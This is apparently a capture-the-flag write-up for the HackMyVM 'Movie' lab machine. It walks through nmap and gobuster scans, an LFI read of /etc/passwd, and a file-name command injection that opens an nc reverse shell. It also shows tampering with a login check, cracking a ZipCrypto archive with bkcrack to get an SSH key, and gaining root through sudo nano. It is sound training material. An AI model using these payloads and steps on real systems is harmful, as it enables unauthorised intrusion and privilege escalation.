NOTES ABOUT Movie
[ 2022-10-10 ] [ HackMyVM / Movie ]Status: Rooted
Skills: Port Scanning, Fuzzing, LFI, Wildcard Command Injection, Reverse Shell, Zip Cracking,
Tools: nmap, ssh, gobuster, bkcrack, nano
PORT SCANNING
$ nmap -T4 -sC -sS -sV -p- 10.0.2.25
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 e7:c1:40:66:c0:be:c8:86:dd:58:21:4a:03:76:78:12 (RSA)
| 256 86:9f:0d:8f:f1:e0:62:90:65:cf:79:ee:5e:e3:12:01 (ECDSA)
|_ 256 2a:e0:ac:89:49:dd:e5:3a:8f:47:36:7a:2f:07:11:b8 (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: movie.hmv
|_http-server-header: Apache/2.4.54 (Debian)
GETTING IN
gobuster -q dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.25 -x html,htm,php,pl
/404.html (Status: 200) [Size: 920]
/data (Status: 301) [Size: 305] [--> http://10.0.2.25/data/]
/dist (Status: 301) [Size: 305] [--> http://10.0.2.25/dist/]
/home.html (Status: 200) [Size: 552]
/index.php (Status: 200) [Size: 552]
/server-status (Status: 403) [Size: 274]
/sitemap.xml (Status: 200) [Size: 762]
/upload.php (Status: 200) [Size: 0]
LFI ON INDEX.PHP
$ gobuster -q fuzz -w /usr/share/seclists/Discovery/Web-Content/api/api-seen-in-wild.txt -u http://10.0.2.25/index.php?FUZZ=/etc/passwd --exclude-length 552
Found: [Status=400] [Length=301] http://10.0.2.25/index.php?edit source=/etc/passwd
Found: [Status=200] [Length=1547] http://10.0.2.25/index.php?get_page=/etc/passwd
Found: [Status=400] [Length=301] http://10.0.2.25/index.php?GetInvertedMatrix (see simInvertMatrix for the C-equivalent)=/etc/passwd
http://10.0.2.25/upload.php
Your file has been successfully uploaded.
http://movie.hmv/converted_videos/hola.mp4
http://10.0.2.25/upload_videos/
PAYLOAD: UPLOAD FILE NAME:
a.avi;nc -c bash 10.0.2.15 80;a.avi
ELEVATING PRIVILEGES
cd data
ls -la
total 56
drwxr-xr-x 3 www-data www-data 4096 Oct 9 00:40 .
drwxr-xr-x 6 www-data www-data 4096 Oct 9 00:35 ..
-rw-r--r-- 1 www-data www-data 28 Sep 28 18:15 .htaccess
-rw-r--r-- 1 www-data www-data 920 Oct 1 09:31 404.html
-rw-r--r-- 1 www-data www-data 303 Oct 1 09:38 config.php
drwxr-xr-x 5 www-data www-data 4096 Oct 1 09:31 dist
-rw-r--r-- 1 www-data www-data 5096 Oct 1 09:31 image.png
-rw-r--r-- 1 www-data www-data 586 Oct 1 09:38 index.php
-rw-r--r-- 1 www-data www-data 1216 Oct 9 00:40 login.php
-rw-r--r-- 1 www-data www-data 98 Oct 1 09:38 logout.php
-rw-r--r-- 1 www-data www-data 7731 Oct 1 08:59 mydata_archive.zip
-rw-r--r-- 1 www-data www-data 1232 Oct 1 09:31 style.css
cat config.php
<?php
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'tarantino');
define('DB_PASSWORD', 'killer');
define('DB_NAME', 'moviedb');
[...]
JUST FOR FUN: login.php “REPAIR”
sed -i 's/rows==1/rows!=1/g' login.php
$ 7z l -slt mydata_archive.zip
[...]
Path = 404.html
Folder = -
Size = 919
Packed Size = 931
Modified = 2022-09-28 02:09:09
Created = 2022-10-01 02:55:11
Accessed = 2022-10-01 02:54:27
Attributes = _ -rw-r--r--
Encrypted = +
Comment =
CRC = 6F47B605
Method = "ZipCrypto Store"
Host OS = Unix
Version = 20
Volume Index = 0
[...]
$ wget https://github.com/kimci86/bkcrack/releases/download/v1.5.0/bkcrack-1.5.0-Linux.tar.gz
$ tar -xf ./bkcrack-1.5.0-Linux.tar.gz
$ ./bkcrack -L mydata_archive.zip
bkcrack 1.5.0 - 2022-07-07
Archive: mydata_archive.zip
Index Encryption Compression CRC32 Uncompressed Packed size Name
----- ---------- ----------- -------- ------------ ------------ ----------------
0 ZipCrypto Store 6f47b605 919 931 404.html
1 ZipCrypto Store a7786ca6 552 564 home.html
2 ZipCrypto Store 00d78482 2602 2614 id_rsa
3 ZipCrypto Store 7e43bef8 143 155 index.php
4 ZipCrypto Store da810eb6 762 774 sitemap.xml
5 ZipCrypto Store ce6bb0d1 1881 1893 upload.php
$ printf '<!DOCTYPE html>' > plain_text
$ zip plain_text.zip plain_text
$ ./bkcrack -C mydata_archive.zip -c 404.html -P plain_text.zip -p plain_text -d decipheredfile
bkcrack 1.5.0 - 2022-07-07
[03:33:39] Z reduction using 8 bytes of known plaintext
100.0 % (8 / 8)
[03:33:39] Attack on 761980 Z values at index 6
Keys: d706e724 ******** a79864b0
0.8 % (6039 / 761980)
[03:34:39] Keys
d706e724 ******** a79864b0
[03:34:39] Writing deciphered data decipheredfile (maybe compressed)
Wrote deciphered data.
$ ./bkcrack -C mydata_archive.zip -k d706e724 ******** a79864b0 -U unlocked.zip pass
bkcrack 1.5.0 - 2022-07-07
[03:43:34] Writing unlocked archive unlocked.zip with password "pass"
100.0 % (6 / 6)
Wrote unlocked archive.
$ unzip ./unlocked.zip
Archive: ./unlocked.zip
[./unlocked.zip] 404.html password:
extracting: id_rsa
[...]
$ ssh tarantino@10.0.2.25 -i id_rsa
tarantino@movie:~$ cat user.txt
******************
PATH TO ROOT
tarantino@movie:~$ sudo -l
Matching Defaults entries for tarantino on movie:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User tarantino may run the following commands on movie:
(root) NOPASSWD: /usr/bin/nano /etc/passwd
tarantino@movie:~$ sudo -u root /usr/bin/nano /etc/passwd
Ctrl+t
chmod u+s /bin/bash
Enter
Ctrl+x
tarantino@movie:~$ /bin/bash -p
bash-5.1# id
uid=1000(tarantino) gid=1000(tarantino) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth),1000(tarantino)
bash-5.1# cd /root/
bash-5.1# ls -la
total 32
-rwx------ 1 root root 33 Oct 1 09:32 root.txt
[...]
bash-5.1# cat root.txt
******************
bash-5.1# /sbin/init 0